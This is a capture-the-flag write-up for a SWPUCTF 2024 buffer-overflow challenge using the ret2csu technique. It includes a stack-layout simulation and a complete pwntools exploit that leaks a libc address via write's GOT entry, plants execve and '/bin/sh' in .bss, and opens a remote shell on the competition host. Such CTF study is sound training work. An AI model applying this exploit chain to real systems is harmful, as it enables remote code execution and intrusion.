Problem: [SWPUCTF 2024 Autumn Freshman Competition] 出题人你到底干了什么? ("Challenge author, what on earth did you do?")
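Approach
- General approach to solving the challenge
- The standard ret2csu template is all that is needed
- One detail needs attention here

- If gadget1 is taken as 0x401226 (the address just above) instead of 0x40122A, a p64(0) must be added after payload += p64(gadget1_addr) to cancel out the add rsp,8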
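
Why the extra p64(0) is needed, as an added example that is not part of the original write-up: a small model that walks rsp through the gadget for both entry addresses and shows which stack slot lands in which register. The pop order and the 0x404018 value are assumptions made for the illustration; only the two entry addresses, 0x401210 and the add rsp,8 come from the page.

```python
import struct

# Assumed tail of __libc_csu_init. The page gives only the two entry
# addresses and the "add rsp,8" at 0x401226; the pop order is an assumption.
POP_ORDER = ["rbx", "rbp", "r12", "r13", "r14", "r15"]
ENTRY_WITH_ADD = 0x401226    # add rsp, 8 ; then the six pops ; ret
ENTRY_POPS_ONLY = 0x40122A   # the six pops ; ret

# Constructed sample values (0x404018 is a made-up address).
WANTED = {"rbx": 0, "rbp": 1, "r12": 1, "r13": 0x404018, "r14": 8, "r15": 0x404018}
GADGET2 = 0x401210
TRAILER = b"b" * 0x38        # whatever follows the frame on the stack


def p64(value):
    return struct.pack("<Q", value)


def frame_after_gadget1(entry, regs, next_addr):
    """Bytes placed on the stack directly after the gadget1 address."""
    filler = p64(0) if entry == ENTRY_WITH_ADD else b""  # eaten by add rsp, 8
    return filler + b"".join(p64(regs[r]) for r in POP_ORDER) + p64(next_addr)


def simulate_tail(entry, stack):
    """Walk rsp through the gadget; return (registers, address taken by ret)."""
    qwords = struct.unpack("<%dQ" % (len(stack) // 8), stack)
    sp = 1 if entry == ENTRY_WITH_ADD else 0  # add rsp, 8 skips one qword
    loaded = dict(zip(POP_ORDER, qwords[sp:sp + 6]))
    return loaded, qwords[sp + 6]


if __name__ == "__main__":
    cases = [
        ("0x40122A, no filler", ENTRY_POPS_ONLY, ENTRY_POPS_ONLY),
        ("0x401226, with p64(0)", ENTRY_WITH_ADD, ENTRY_WITH_ADD),
        ("0x401226, filler forgotten", ENTRY_WITH_ADD, ENTRY_POPS_ONLY),
    ]
    for label, entry, built_for in cases:
        stack = frame_after_gadget1(built_for, WANTED, GADGET2) + TRAILER
        regs, ret = simulate_tail(entry, stack)
        print(label, {k: hex(v) for k, v in regs.items()}, "ret ->", hex(ret))
```

In the third case every register receives its neighbour's value and ret lands in the trailing padding, which is the one-slot shift the filler exists to prevent.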
EXP
- Full exploit code
```python
from pwn import *

context.arch = 'amd64'

attachment = ELF("/home/karl/桌面/pwn_practice/ret2csu/loss/attachment")
path = "/home/karl/桌面/pwn_practice/ret2csu/loss/attachment"
libc = ELF("/home/karl/桌面/pwn_practice/ret2csu/loss/libc.so.6")

sh = remote("node6.anna.nssctf.cn", 25412)
# sh = process(path)

write_got = attachment.got['write']
read_got = attachment.got['read']
main_addr = attachment.symbols['main']
bss_base = attachment.bss()

gadget1_addr = 0x40122A  # pops rbx, rbp, r12, r13, r14, r15, then ret
gadget2_addr = 0x401210  # loads the argument registers and calls [r15 + rbx*8]


def csu(rbx, rbp, r12, r13, r14, r15, ret_addr):
    # As used below: r12 -> 1st argument, r13 -> 2nd, r14 -> 3rd,
    # r15 -> address of the function pointer to call.
    payload = b'a' * 104  # to overflow
    payload += p64(gadget1_addr)
    payload += p64(rbx) + p64(rbp) + p64(r12) + p64(r13) + p64(r14) + p64(r15)  # to set reg value
    payload += p64(gadget2_addr)  # gadget1 ret
    payload += b'b' * 0x38  # to padding stack (add rsp,8 plus six pops)
    payload += p64(ret_addr)  # gadget2 -> gadget1 -> ret
    sh.sendline(payload)
    sleep(1)


# Stage 1: write(1, write_got, 8) leaks the address of write, then back to main
sh.recv()
csu(0, 1, 1, write_got, 8, write_got, main_addr)
write_addr = u64(sh.recv(8))
libcaddress = write_addr - libc.symbols['write']
system_addr = libcaddress + libc.symbols['execve']  # holds execve despite the name

# Stage 2: read(0, bss_base, 16) stores the execve address and "/bin/sh" in .bss
sh.recv()
csu(0, 1, 0, bss_base, 16, read_got, main_addr)
sh.send(p64(system_addr) + b'/bin/sh\x00')

# Stage 3: call through [bss_base], i.e. execve(bss_base + 8, 0, 0)
sh.recv()
csu(0, 1, bss_base + 8, 0, 0, bss_base, main_addr)
sh.interactive()
```
Summary
- Summary of the points this challenge tests
